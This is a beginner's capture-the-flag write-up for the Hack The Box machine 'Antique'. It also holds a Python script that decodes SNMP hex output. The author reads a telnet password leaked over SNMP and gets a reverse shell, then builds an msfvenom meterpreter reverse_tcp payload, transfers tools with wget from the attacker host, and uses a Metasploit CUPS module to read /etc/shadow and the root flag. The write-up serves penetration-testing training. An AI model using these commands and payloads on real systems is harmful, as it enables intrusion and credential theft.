Antique
This is my write-up for the machine Antique located at: https://app.hackthebox.com/machines/Antique.
I am a beginner at penetration testing, so I will be referencing the Official Hack The Box Walk-through for this machine.
From the tags, I am able to notice that this machine is about printer exploitation on Linux:
A basic nmap scan shows that only telnet is online:
Trying to telnet into the system, it asks for a password:
I also had a deeper nmap scan running: nmap -A -T4 -p- 10.10.11.107 -oN antique.nmap
This nmap scan came back with pretty much the same information. I then viewed the walk-through to see where I had messed up. I learned about a tool called snmpwalk. In the walk-through, the author runs snmpwalk -v 2c -c public 10.10.11.107, which gets the following output:
I had actually found the password for telnet on my own, but I was unable to decode it:
I used snmpget, while the walk-through used snmpwalk. In the walk-through they used binascii (a Python import) to decode the bytes. I wanted to find a solution that was a bit more basic. I ended up using https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html to convert the bytes from hex to ASCII:
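As an added example (not part of this write-up or the HTB walk-through), here is the same decoding step done in Python instead of an online converter. It parses snmpwalk-style output, reassembles each Hex-STRING value (net-snmp prints 16 bytes per line and continues long values on the following lines with no OID prefix), and returns the printable prefix of each, which is how the password falls out of the surrounding bytes. The sample output below and the OID the hex string hangs off are constructed for this example, not copied from the box. Worth knowing for the earlier port scan: nmap -p- is TCP-only by default, and SNMP listens on UDP/161, so it never shows up without -sU (or without simply trying snmpwalk).

```python
import binascii
import re

# Constructed sample in snmpwalk's output format (hypothetical OIDs and
# values; only the hex bytes matter here). The Hex-STRING wraps after
# 16 bytes onto a bare continuation line, as net-snmp prints it.
SAMPLE_WALK = """\
iso.3.6.1.2.1.1.1.0 = STRING: "HTB Printer"
iso.3.6.1.2.1.1.5.0 = STRING: "antique"
iso.3.6.1.2.1.43.5.1.1.17.1 = Hex-STRING: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32
33 0A 00 FF
iso.3.6.1.2.1.1.3.0 = Timeticks: (12345) 0:02:03.45
"""

OID_LINE = re.compile(r"^(?P<oid>\S+) = (?P<type>[A-Za-z-]+): ?(?P<value>.*)$")
HEX_ONLY = re.compile(r"^(?:[0-9A-Fa-f]{2}\s*)+$")


def parse_hex_strings(walk_output):
    """Return {oid: bytes} for every Hex-STRING value in snmpwalk output."""
    results = {}
    current = None  # OID whose Hex-STRING may continue on the next line
    for raw in walk_output.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = OID_LINE.match(line)
        if m:
            current = None
            if m.group("type") == "Hex-STRING":
                current = m.group("oid")
                results[current] = binascii.unhexlify(m.group("value").replace(" ", ""))
        elif current and HEX_ONLY.match(line):
            # Bare hex line: continuation of the previous Hex-STRING value.
            results[current] += binascii.unhexlify(line.replace(" ", ""))
        else:
            current = None
    return results


def printable_prefix(data):
    """Decode the leading run of printable ASCII, stopping at the first
    control byte or non-ASCII byte (the padding after the password)."""
    out = []
    for b in data:
        if 0x20 <= b < 0x7F:
            out.append(chr(b))
        else:
            break
    return "".join(out)


def decode_walk(walk_output):
    """Map each Hex-STRING OID to its printable prefix."""
    return {oid: printable_prefix(raw) for oid, raw in parse_hex_strings(walk_output).items()}


if __name__ == "__main__":
    for oid, text in decode_walk(SAMPLE_WALK).items():
        print(f"{oid}: {text!r}")
```

To use it on a real dump, feed the file saved from snmpwalk (or the single snmpget line) to decode_walk; stopping at the first non-printable byte is what separates the credential from whatever padding follows it.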
The password seems to be P@ssw0rd@123!!123. I was in!
I then noticed the walk-through mentioned running exec id. I then tried playing around with Linux commands, and ended up finding the user.txt file:
I noticed the write-up used Python for the reverse shell. I then used https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python to see if I could use one of their Python commands. Once I changed their command from python to python3, it worked:
I viewed the walk-through again to see what I missed. The walk-through author runs the netstat command to see what connections are there:
They then go on to say that we should use chisel to connect to the port. I ran into an issue here where I was unable to download a GitHub repository onto the machine itself. I then realized that you build the binary locally and then upload it to the server. I uploaded the file to the machine by running python3 -m http.server in the folder where chisel was downloaded. I was then able to fetch it by running wget http://10.10.14.10:8000/chisel on the remote machine. When I uploaded the file, I was unable to run it due to a dependency error about the version of libc:
I then followed this write-up to see what I had missed and what I could have done instead. They run wget localhost:631, which creates a file called index.html in the folder you are in. There, you can see that CUPS is mentioned:
When we search for cups in Metasploit, we get the following:
We first make a shell file to upload to the server. To do this, the walk-through mentioned previously uses msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<YOUR-IP> LPORT=1337 --format elf > shell. This will create the shell file in your directory. To move it to the remote machine, you can use the python http.server command mentioned previously. Before I ran the shell executable, I ran the following commands in Metasploit (based off of this write-up):
After I ran the run command, I switched to the remote machine and ran the shell executable (run chmod +x shell first to make it executable). This gave me a connection in Metasploit:
I then ran the following commands to look for the cups post-exploitation module:
I then hit run and got an output:
Opening that file shows the output of /etc/shadow:
Since we want to get the output of /root/root.txt, I changed my option in metasploit to that:
Reading that file got me the root flag: